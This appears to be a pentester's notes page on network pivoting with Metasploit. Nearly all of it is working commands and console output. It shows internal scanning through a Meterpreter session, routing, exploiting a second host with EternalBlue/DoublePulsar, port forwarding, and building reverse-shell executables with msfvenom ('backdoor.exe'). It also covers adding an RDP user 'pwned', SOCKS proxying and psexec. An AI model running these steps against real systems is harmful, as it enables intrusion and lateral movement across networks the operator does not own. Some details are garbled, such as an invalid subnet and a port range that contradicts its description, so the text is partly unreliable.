Pivoting notes
*** THIS PAGE WILL NEED TO BE UPDATED!! ***
// discover hosts on inside network
meterpreter > background
msf > use post/windows/gather/arp_scanner
msf (arp_scanner) > set SESSION <id>
msf (arp_scanner) > set RHOSTS 192.168.0.0/24
msf (arp_scanner) > run
//Before we are able to run a port scanner from Metasploit against the private systems, instruct Metasploit to route all traffic destined to the private network 192.168.0.0/24 through the existing Meterpreter session established between our machine and the compromised server
meterpreter > background
msf > route add 192.168.0.0 255.255.255.0 <session_id>
proxychains xfreerdp /u:admin /p:**** /v:10.0.0.1
ssh -f -N -D 9050 -i pivot user@10.0.0.1
It is important to note that we configure the routing rule on the Metasploit console (msf >) not on Meterpreter session. The routing rule has to exist on our system β within Metasploit. That is why we issued the command βbackgroundβ to put our Meterpeter session on the background and get to our Metasploit console.
After configuring the routing rule, we are able to run a TCP Port Scanner from within Metasploit against the two private systems. The following commands show how to use Metastploitβs native port scanner and assign the remote hostsβ IPs and port range. We will scan the first 10000 ports, as follows:
// Port scan
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.0.11,12
msf auxiliary(tcp) > set PORTS 1β1000
msf auxiliary(tcp) > run// double pulsar
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.0.11
msf exploit(eternalblue_doublepulsar) > run
meterpreter > background
[*] Backgrounding session 2β¦
The exploit ran successfully, and we now have a 2nd Meterpreter session. But this time, the 2nd session is tunneled within the 1st session and pivoted through the web server. To verify that, we issue the sessions command to see the existing sessions:
// Check sessions
msf exploit(eternalblue_doublepulsar) > sessions
Active sessions
===============
Id Type Information Connection
β β β β β β β β β β β β β β
1 meterpreter x86/windows WEB\MyUser @ WEB 10.10.10.10:44989 -> 50.50.50.50:6666
2 meterpreter x86/windows HID\MyUser @ HID 192.168.0.10: 49163 -> 192.168.0.11:4444// implement port forwarding rules on our Meterpreter session
meterpreter > portfwd add -l 10080 -p 80 -r 192.168.0.12
meterpreter > portfwd add -l 10022 -p 22 -r 192.168.0.12
meterpreter > portfwd add -l 10454 -p 445 -r 192.168.0.12
//Now, we are ready to access the resources!
// Using firefox, we will enter the URL: http://localhost:10080
// # ssh myadmin@localhost
// # smbclient -L localhost
// # smbclient \\localhost\<share_name> -U myadmin
// Step 1 Set up a Multi Handler on Pentester Machine
// We will need to decide on a port number and set up a listener on that port. The purpose of this
// listener (handler) is to receive a connection with Meterpreter Reverse TCP. However, we will
// notice that it is neither Victim 1 nor Victim 2 who will actually connect to that listener. It
// will be our Metasploit connecting to itself using the already established Meterpreter session
// with Victim 1.
msf5 exploit(windows/smb/eternalblue_doublepulsar) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LPORT 5555
msf5 exploit(multi/handler) > set ExitOnSession false
msf5 exploit(multi/handler) > set LHOST 10.10.10.10
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.10.10:5555
msf5 exploit(multi/handler) >
// Step 2 Set up a Reverse Port-Forward Rule on Victim 1
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1β¦
meterpreter > portfwd add -R -L 10.10.10.10 -l 5555 -p 6666
[*] Local TCP relay created: 10.10.10.10:5555 <-> :6666
// Now we are ready to move on and generate our backdoor.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=6666 -f exe -o backdoor.exe
// Once the backdoor runs on the second victim, you should receive the following message on Metasploit:
[*] Meterpreter session 2 opened (10.10.10.10:5555 -> 10.10.10.10:35937) at 2020β12β30 04:10:55 -0500
// The second session is now established. And as you can see, the session is
// established from Metasploit system to itself. However, if list the available
// sessions, you will see the IP address of the second Victim as the ultimate
// target of the session:
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
β β β β β β β β β β β β β β β β
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN7-PC
10.10.10.10:1234 -> 50.50.50.50:49177 (50.50.50.50)
2 meterpreter x86/windows WIN7-PC\win7admin @ WIN7-PC
10.10.10.10:5555 -> 10.10.10.10:35937 (192.168.0.13)
// Reverse & bind shell
// way to get RDP
set payload windows/x64/shell_bind_tcp
set payload windows/meterpreter/bind_tcp
meterpreter> run getgui -e -u pwned -p password1337
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=2222 -f exe > shell.exe
run autoroute -s 10.20.20.20.0/24
use auxiliary/socks5
set srvport 1081
// more notes - adding route and using socks proxy
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=4444 -f raw -o /root/Desktop/msf.bin
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 4444
set LHOST eth0
exploit -j
sessions -i 1
run autoroute -s 192.168.16.0/24
run autoroute -p
// set up a portforward
portfwd add -R -p 2222 -l 443 -L workstation1
search socks
use 1
set srvport 9050
options
exploit -j
use exploit/windows/smb/psexec internal network mapping and pivoting
// double pivoting
https://www.hdysec.com/double-pivoting-both-metasploit-and-manual/#what-is-pivoting
Last updated
Was this helpful?